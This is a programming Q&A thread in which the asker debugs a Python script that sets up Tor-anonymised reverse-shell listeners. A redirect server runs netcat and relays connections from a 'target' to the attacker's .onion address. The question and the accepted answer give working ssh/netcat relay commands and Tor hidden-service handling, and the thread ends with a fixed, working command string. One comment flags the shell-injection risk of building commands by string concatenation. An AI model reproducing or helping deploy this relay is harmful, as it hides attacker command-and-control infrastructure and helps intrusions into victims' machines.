# SSH command works manually, but not through python

Tags: python, ssh, tor

I am writing a python script to help me create reverse listeners through tor. The chain is as follows:

target connects to > a linux redirect server configured to use tor for all tcp and dns traffic.

This server listens on specified port and forwards connections thru tor > to the attacker pc's .onion address where netcat picks up the connection.

I am SSH'ing to the redirect server to create the forwarding ports as needed. My script works fine with the exception of the ssh command i.e. `ssh user@ip.address "nc -nvlp 1234 -c'nc address.onion 1234'`. If I enter the command in a bash terminal everything works great.

But I have tried sending the ssh command with os.system, subprocess, and so on to no avail. i have also tried using paramiko to connect to the ssh and issue the command but same problem. As I said, if I copy the command that python would send to a bash terminal it works fine. Any help would be much appreciated.

Here is the snippet that is not working, the rest of the code just edits and restarts tor but I can post it all if anyone needs it:

```
 SSH_Hostname = '192.168.1.71'
 SSH_Username = "servant"
 SSH_Command ="ssh %s@%s  \"nc -nvlp <PORT> -c 'nc <ONION> <PORT>' </dev/null &\" &" %(SSH_Username,SSH_Hostname) #works manually

 def SSH_Script(port):
     newSSH_Command=SSH_Command.replace('<ONION>',Get_Onion(TOR_Hidden_Service_Dir))
     newSSH_Command=newSSH_Command.replace('<PORT>',port)

     print "Configuring Redirector > %s" %newSSH_Command
     os.system(newSSH_Command)
```

Caller:

```
def Create_Listener(lport):
print "Starting listener on %s ..." %lport
Add_Tor_Port(TOR_Hidden_Service_Dir,lport)

retvalue = os.popen("service tor status|grep Active:").read() 
if "inactive" in retvalue:
    print "Starting Tor ..."
    os.system("service tor start")
else:
    print "Re-starting Tor ..."
    os.system("service tor restart")
sleep(3)
print 'Onion Address = %s' %Get_Onion(TOR_Hidden_Service_Dir)
SSH_Script(lport)

#start netcat
portlist = Get_Tor_Ports(TOR_Hidden_Service_Dir)
for prt in portlist:
    print "listening on port %s" %prt
```

get_onion:

```
def Get_Onion(hs_dir):
hostnamefile= open('%s/hostname' % hs_dir)
onion= hostnamefile.read().replace('\n','')
hostnamefile.close()
return onion
```

this is what the print newSSH_comand outputs:

```
ssh servant@192.168.1.71  "nc -nvlp 55501 -c 'nc 2xvch5okdl76sn2j.onion 55501' </dev/null &" &
```

and if i copy that string and enter in bash everything works. just cant get python to execute it correct

Comment: you should _really_ use `subprocess` with argument list instead of trying to generate the quoted command yourself!

Comment: i have tried subprocess with no luck, possibly due to the complexity of the command, maybe im not breaking down the argument list correctly.

Comment: The call to SSH_Script(...) is missing from your example. Also the return-value of Get_Onion(...) is probably important to analyze your problem. Please provide some example values and the error message you receive from running your example.

Comment: @Brad you are redirecting error output to null. Try writing it to a file instead and tailing the file

Comment: @Brad Also try looking in journalctl for clues

Comment: the redirection came about because i wanted a command that i didnt have to wait  for to finish.  ill try redirecting to a file.  I dont get any errors anywhere, it just does nothing.  i dont see the netcat process even start on redirect server, unless manually run

Comment: If you're getting your onion addresses from an untrusted source, then this is outright insecure (ie. permitting malicious addresses to do shell injections). Generating shell commands via string concatenation is a Really Bad Idea.

Answer (score 0):

I suspect this is a o/s level problem. When you manually run the SSH command, are you running it from the same account this python script runs as? The user account used to execute the Python script may not be able to access SSH or the user doesn't have access to a authorized_keys file it can use to lookup the SSH key for the user@host combination. Check your SSH setup ;)

If you run this code as it is, do you see any login attempts at the host on 192.168.1.71 from the machine where this code runs?

Also your line `hostnamefile= open('%s/hostname' % hs_dir)` in your get_onion seems to have an extra space typo after the %

Comment: thanks for looking into this ...same user account when running script,  the logs on the ssh server show identical entries when running from python vs from bash, so i think the login is ok

Comment: i did notice this the output from the python ssh command is: [3]   Done                    ssh servant@192.168.1.71 "nc -nvlp 55501 -c 'nc 2xvch5okdl76sn2j.onion 55501' </dev/null &"                     and running it manually returns just:  [3] 11324

Answer (score 0):

Well i got it working for anyone else who has trouble like this.  For whatever reason python didnt like my " and ' order.  I changed:

```
SSH_Command ="ssh %s@%s  \"nc -nvlp <PORT> -c 'nc <ONION> <PORT>' </dev/null &\" &" %(SSH_Username,SSH_Hostname)
```

To:

```
SSH_Command ="ssh %s@%s  'nc -nvlp <PORT> -c \"nc <ONION> <PORT>\" </dev/null &'&" %(SSH_Username,SSH_Hostname)
```

doesnt make much sense to me but either way its working.